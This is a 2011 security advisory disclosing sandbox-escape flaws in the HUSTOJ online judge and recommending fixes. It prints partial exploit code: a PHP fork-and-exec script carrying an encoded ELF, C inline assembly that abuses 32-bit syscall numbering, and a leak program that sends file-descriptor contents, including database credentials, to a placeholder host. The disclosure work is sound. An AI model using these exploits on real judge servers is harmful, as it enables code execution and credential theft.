Title: Security Holes Discovered in HUSTOJ
Author: LIU Yu <pineapple.liu@gmail.com>
Source: OpenJudge Alliance Technical Report (TR-OJA-201112A)
Date: 2011/12/09 (last revised on 2011/12/25)
Version: 1.4
License: Creative Commons Attribution-ShareAlike 3.0 License (CC BY-SA 3.0)
URL: http://openjudge.net/TR/201112A


Security Holes Discovered in HUSTOJ

by LIU Yu <pineapple.liu@gmail.com>

Abstract: Security vulnerabilities have been discovered in the open-source online judge system HUSTOJ (project site http://code.google.com/p/hustoj/). Due to a series of design pitfalls and defects in the judge_client component of HUSTOJ, attackers can submit malicious solution programs to bypass most security restrictions of HUSTOJ. Validated security issues include, but not limit to, 1) executing arbitrary binary program on the judge server, 2) leak of system information, 3) leak of test data, etc.

1. Introduction

Online judge systems [1] are a special kind of web-based automatic program testing and grading system for ACM/ICPC like programming contests and assignment evaluation in IT/CS courses like data structure, algorithm design, etc. For more than a decade, universities and educational institutions world-wide have shown an increasing interest in setting up either private or public-domain online judges to facilitate relevant educational activities. Because an online judge system has to receive and execute user-submitted program code, security issues have always been the top concern when developing and (or) deploying such systems [1].

HUSTOJ [2] is an online judge system initiated by former ACM/ICPC contestant(s) from Huazhong University of Science and Technology (HUST). It was first released on Google Code in Nov. 2008 under the GNU General Public License 2.0. The development team of HUSTOJ involves 8 members as of Dec. 2011. As HUSTOJ becomes popular especially among educational institutions in the Asia-Pacific region [2], some security issues, such as [3], have been identified and reported.

The OpenJudge Alliance [4], as a community specialized in the technical aspect of automated computer program grading, feels obliged to conduct a systematic assessment of the security of HUSTOJ based on our expertise. Our preliminary review of the source code of HUSTOJ's judge_client core component is disappointing. We discovered some critical security holes resulting from a series of design pitfalls and implementation defects. Based on the security holes discovered, we are able to compose two exploits that, when submitted to HUSTOJ hosts as solution programs, succeeded in executing arbitrary binary code on some judge servers of HUSTOJ. Validated security risks include, but not limit to, leaking system information, leaking test data, opening TCP/ICPC connections to a third-party host on the Internet, etc.

This report is organized as follows. In Section 2, we review the functionalities and design pitfalls of the judge_client component of HUSTOJ. In Section 3, two exploits are proposed and validated based on the security risks identified from the design pitfalls. Finally, Section 4 presents concluding remarks and our recommendations to HUSTOJ hosts as well as developers.

2. Review of Judge Client Design

The judge_client component of HUSTOJ is an all-in-one program for 1) setting up the test environment (downloading test data, solution code, preparing chroot jail, etc), 2) compiling the solution code, 3) executing the solution code and collecting results / statistics, 4) reporting judge results to the database server, and 5) performing anti-plagiarism detection. This review is based on the source code r1334 available at http://code.google.com/p/hustoj/source/browse/?r=1334. Some reported security issues also affect more recent revisions (i.e. including current SVN head r1364).

Pitfall 1: Monolithic All-In-One Design

The judge_client component is a multi-process program running on i386 / x86_64 linux systems (i.e. the judge server). The solution program (or the interpreter of the solution code in case of interpreted programs like Java, PHP, Python, etc.) is executed in a traced subprocess of judge_client. The problem with this design is that the memory space of the solution program is a duplication of that of judge_client at the time the latter calls fork(). In other words, any in-memory data of judge_client created before calling fork(), including open file descriptors, open directory streams, etc. are available in the memory space of the subprocess running the solution program. This makes it possible for the solution program to inspect data belonging to judge_client.

A snippet of the main() function in judge_client.cc shows what have been done before calling fork(). When started, judge_client loads configurations, downloads test data and solution code from the database server, compiles the solution code, and copies runtime support of the solution program to a chroot jail.

int main(int argc, char** argv)
{
    ...
    init_parameters(...);
    init_mysql_conf();
    ...
    get_solution_info(...);
    get_problem_info(...);
    get_solution(...);
    ...
    compile(...);
    ...
    copy_<lang>_runtime(...);
    ...
    pid_t pidApp = fork();
    ...

The most critical information processed by judge_client before calling fork() is perhaps the content of the local judge.conf file. It contains the account and password of the database server in clear text. And a defect in the init_mysql_conf() function leaves this file open after loading configurations, and this opened file descriptor is available for read by the solution program (issue 1)! In the upcoming Section 3, we show how this can be done in the proposed exploits.

void init_mysql_conf()
{
    ...
    FILE *fp;
    ...
    fp = fopen("./etc/judge.conf", "r");
    ...
}

Of course, having the solution program know this information alone won't incur security risks. But as we shall see later, other pitfalls of judge_client make it possible for the solution program to leak this information to the outside of the judge server.

Pitfall 2: User-Mode Tracing of Multi-Process/-Thread Program

The judge_client component uses ptrace() to intercept system calls made by the solution program. The developers of HUSTOJ seem to wish to fit all language support within a unified judge framework. And to support interpreted programming languages such as Java, Python, PHP, Perl, etc., they allow for multi-process / -thread solution programs. Unfortunately, sandboxing a multi-processed/-threaded program through pure user-mode ptrace() is practically NOT a reliable mechanism to enforce security [5,6].

Even not considering the state-of-the-art attacks such as TOCTTOU in [6], HUSTOJ's judge_client is still crippled in the way it intercepts system calls. A snippet of judge_client.cc shows that it only watches for the main process of the solution program, and any subprocesses spawned from the main process are completely ungoverned. In other words, as long as the solution program can successfully spawn a subprocess (i.e. through any of SYS_fork(), SYS_vfork(), or SYS_clone() available in linux systems), the subprocess can do anything allowed for user judger (i.e. uid 1536) (issue 2).

void run_solution(...)
{
   ...
   setrlimit(...);
   ...
   chroot(...);
   setuid(1536);
   ...
   ptrace(PTRACE_TRACEME, ...);
   ...
   execl(...);
   ...
...
void watch_solution(...)
{
    ...
    while (1)
    {
        wait4(...);
        ...
        ptrace(PTRACE_GETREGS, ...);
        ...
        ptrace(PTRACE_SYSCALL, ...);
    }

From okcalls.h, we can learn the system call numbers considered "safe" for each supported programming language. Notably, SYS_clone() is granted for Java, PHP, and C#(Mono) (issue 3a). SYS_open() and SYS_execve() are always allowed. Because i386 and x86_64 linux systems have different system call ABI's, the allowed system call numbers are listed separately in okcalls.h.

...
#ifdef __i386__
...
int LANG_CV[256]={...,SYS_open,...,SYS_execve,...};
int LANG_JV[256]={...,SYS_clone,...,SYS_execve,...};
...
#else
...
int LANG_CV[256]={...,SYS_open,...,SYS_execve,...};
int LANG_JV[256]={...,SYS_clone,...,SYS_execve,...};
...

Unfortunately, the way that judge_client inspects system calls lead us to believe that the developers of HUSTOJ are unaware of the fact that an x86_64 program can invoke system calls from both i386 and x86_64 lands. A closer look at the watch_solution() function in judge_client.cc reveals that judge_client always checks the observed system call numbers, i.e. stored in the ORIG_RAX register, against the white list of native system calls, regardless of the code segment register (CS) and the instruction that initiated the system call. In case a 64bit solution program invokes system calls from 32bit land [12], judge_client will attribute the call numbers to wrong identities. And there is chance, as we shall see in Section 3, to bypass "unsafe" system calls by mistake (issue 3b).

...
#define REG_SYSCALL orig_rax
#define REG_RET rax
...
void watch_solution(...)
{
    ...
    ptrace(PTRACE_GETREGS, pidApp, NULL, &reg);
    if (call_counter[reg.REG_SYSCALL] == 0)
    {
        ACflg = OJ_RE;
        ...

Moreover, according to [7], the list of accepted system calls is generated with strace [8] not following any subprocess of the sample program (issue 4). This can both introduce unnecessary / insecure system calls, and miss some system calls that should be allowed.

Pitfall 3: Excessive Permissions of Solution Program

The solution program is executed as a special user judger (uid 1536). Despite that the judge_client uses chroot jail to prevent the solution program from touching other parts of the operating system, the excessive permissions granted to judger are still a source of security risks. One cannot identify the permissions granted to the judger directly from the source code of judge_client. Nevertheless, the proposed exploits to be presented in Section 3 reveals that the judger can at least write files to the chroot jail and make TCP/IP connections to a third-party host on the internet! (issue 5)

3. Proposed Exploits

Recall from Section 2 that, due to issue 2, if the solution program can spawn a subprocess through any of SYS_fork(), SYS_vfork(), or SYS_clone(), the spawned subprocess will become ungoverned and can do anything grated to user judger. As a matter of fact, this can be achieved in the following two ways!

Exploit 1: SYS_clone through Interpreted Languages

Recall from issue 3a that call to SYS_clone() is granted by judge_client to interpreted languages including Java, PHP, and C# (Mono). We choose PHP as the sample language to compose the first exploit. It does three things, 1) spawn a subprocess through pcntl_fork() (which internally invokes SYS_clone()), 2) in the main process, loop for a short period of time, 3) in the child process, write a binary program to the chroot jail of the judge server (c.f. issue 5), and execute it through pcntl_exec() (which internally invokes SYS_execve). For legibility, we only reproduce a proportion of the exploit code here. The complete source code can be obtained from [13]. Note that variable $code in function child() is a base64-encoded, linux ELF program, which we call leak.

<?php
  function child()
  {
      $code = 'f0VMRgIBAQAAAAAAAAAAAAIAPg...';
      $code_cmd = './leak';
      if ($handle = @fopen($code_cmd, 'w'))
      {
          @fwrite($handle, base64_decode($code));
          @fclose($handle);
          @chmod($code_cmd, 0775);
          @pcntl_exec($code_cmd, array("0"));
      }
      return 0;
  }
  function traced()
  {
      for ($i = 0; $i < 30000000; $i++);
      return 0;
  }
  $pid = @pcntl_fork();
  if ($pid == 0)
  {
      exit(child());
  }
  exit(traced());
?>

Exploit 2: SYS_fork through C++ Inline Assembly

The second exploit originates from [12], which takes advantage of issue 3b. In 64bit linux systems, it happens that SYS_open() from 64bit land has the same number, i.e. 2, as SYS_fork() from 32bit land. Therefore, if a 64bit solution program invokes system call 2 in 32bit mode, the judge_client will take it as SYS_open(), but the kernel actually executes SYS_fork(). Following this manner, we are able to compose the second exploit in C/C++ with inline assembly. Note that on judge servers running 32bit linux systems, this exploit can be correctly detected and restricted by respective 32bit judge_client. But on 64bit judge servers, the judge_client will get fooled and bypass the 32bit SYS_fork invoked through INT 80. For legibility, we only show a proportion of the exploit code here. The complete source code can be obtained from [13]. Functions child() and traced() are likewise to those in Exploit 1, and are omitted to reserve space.

...
int child();
...
int traced();
...
int main(void)
{
    int pid;
    asm volatile("movl $2, %%eax\n"
        "int $0x80\n"
        "movl %%eax, %0\n": "=r"(pid));
    if (pid == 0)
    {
        return child();
    }
    return traced();
}

The leak Program

To make the proposed exploits more informative, we do three things in the above-mentioned leak program(s), 1) read the first 4kB content of a given open file descriptor (c.f. issue 1), 2) encode the content of the file in base64 format, and 3) post the encoded string to an HTTP URL (c.f. issue 2 and 5). The file descriptor to read is specified as the first command line argument of the leak program. For step 3, it is possible to directly open socket in the leak program. When used with Exploit 1, we can make use of the PHP interpreter to simplify this step. For legibility, we only show a proportion of the leak program here. The complete source code can be obtained from [13]. Note that http://some.host.name/... is a fake url to post the content to, and paste.py is a python CGI script that accepts and stores HTTP GET data.

...
void encode(FILE *, FILE *, int);
...
int main(int argc, char * argv[])
{
    int fd = ((argc <= 1) ? 0 : atoi(argv[1]));
    lseek(fd, 0, SEEK_SET);
    FILE * fin = fdopen(fd, "r");
    FILE * fout = popen("/php", "w");
    if (fin && fout)
    {
        fprintf(fout, "<?php @fopen('http://some.host.name/paste.py?data='.urlencode('");
        encode(fin, fout, 4 * 1024);
        fprintf(fout, "'), 'r');\n");
    }
    if (fout) fclose(fout);
    return 0;
}

Validation

Submitting Exploit 1 to HUSTOJ at http://hustoj.sinaapp.com/ as a solution to problem 1015, we are able to identify that the proposed exploit does work as expected. Because the main process of the PHP script does nothing but busy loop, the submission got WA (sid 37489). It is possible to actually solve the problem and got AC while exploiting the judge server. We also locally validated that Exploit 2 can escape from the tracing of judge_client running on 64bit linux systems.

4. Conclusions and Recommendations

We discovered three design pitfalls and six security issues in the judge_client core component of HUSTOJ -- an open-source online judge system [1,2]. Due to the pitfalls, it is possible for an attacker to execute arbitrary binary code on the judge server.

Following are some recommendations from the OpenJudge Alliance [4].

Recommendations to HUSTOJ Hosts

  • turn OFF all interpreted languages and disable inline assembly for C/C++ in your HUSTOJ systems;
  • withdraw unnecessary permissions from user judger on all your judge server(s);
  • subscribe to the mailing list of OpenJudge Alliance [4] and keep a close eye on HUSTOJ project site [2] to get latest update notices;

Recommendations to HUSTOJ Developers

  • decompose the judge_client into a set of small programs;
  • reconsider the necessity / solution to support interpreted programming languages;
  • consider more robust means of security enforcements such as Sandbox Libraries [9], AppArmor [10], SE-Linux [11], etc.;
  • learn some up-to-date results from the research community on security;
  • employ a good / secure coding style;

Frankly speaking, the HUSTOJ project is experiencing an inevitable, tough stage of most software systems when trying to incorporate new features. But in the long run, as developers of a security system like online judge, one cannot be more careful when it comes to bringing in new features.

References

  1. A. Kurnia, A. Lim, B. Cheang, Online Judge, Computers & Education, 36(4), 2001
  2. HUSTOJ Project http://code.google.com/p/hustoj/
  3. HUSTOJ (fckeditor) Remote Arbitrary File Upload Exploit. http://www.exploit-db.com/exploits/12697/
  4. OpenJudge Alliance, http://openjudge.net
  5. T. Garfinkel: Traps and pitfalls: Practical problems in system call interposition based security tools. In Proc. Network and Distributed Systems Security Symposium, 2003
  6. R. N. M. Watson. Exploiting Concurrency Vulnerabilities in System Call Wrappers. In Proc. 1st USENIX Workshoop on Offensive Technologies (WOOT), 2007
  7. Add Programming Language to HUSTOJ http://code.google.com/p/hustoj/wiki/AddProgrammingLanguage
  8. strace http://en.wikipedia.org/wiki/Strace
  9. Sandbox Libraries http://openjudge.net/Solutions/LibSandbox
  10. AppArmor http://en.wikipedia.org/wiki/AppArmor
  11. SE-Linux http://selinuxproject.org/
  12. Chris Evans. Linux syscall interception technologies partial bypass. http://scary.beasts.org/security/CESA-2009-001.html
  13. Source Code of Exploits, http://github.com/openjudge/TR-OJA-201112A

This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License (CC BY-SA 3.0), and code samples are licensed under the New BSD License (3-Clause). Cite this work as,

LIU Yu. Security Holes Discovered in HUSTOJ. OpenJudge Alliance Technical Report (TR-OJA-201112A), 2011 http://openjudge.net/TR/201112A